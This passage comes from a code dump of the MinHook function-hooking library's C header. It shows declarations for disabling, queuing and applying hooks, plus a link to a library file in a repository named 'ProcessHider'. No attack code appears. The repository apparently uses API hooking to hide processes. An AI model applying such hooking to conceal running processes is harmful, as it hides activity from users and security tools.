161 | MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget); 162 | 163 | // Queues to enable an already created hook. 164 | // Parameters: 165 | // pTarget [in] A pointer to the target function. 166 | // If this parameter is MH_ALL_HOOKS, all created hooks are 167 | // queued to be enabled. 168 | MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget); 169 | 170 | // Queues to disable an already created hook. 171 | // Parameters: 172 | // pTarget [in] A pointer to the target function. 173 | // If this parameter is MH_ALL_HOOKS, all created hooks are 174 | // queued to be disabled. 175 | MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget); 176 | 177 | // Applies all queued changes in one go. 178 | MH_STATUS WINAPI MH_ApplyQueued(VOID); 179 | 180 | // Translates the MH_STATUS to its name as a string. 181 | const char * WINAPI MH_StatusToString(MH_STATUS status); 182 | 183 | #ifdef __cplusplus 184 | } 185 | #endif 186 | 187 | -------------------------------------------------------------------------------- /include/libMinHook.x64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kernelm0de/ProcessHider/b9ae6634e8277c152c8e7ac6b867055d0087c977/include/libMinHook.x64.lib --------------------------------------------------------------------------------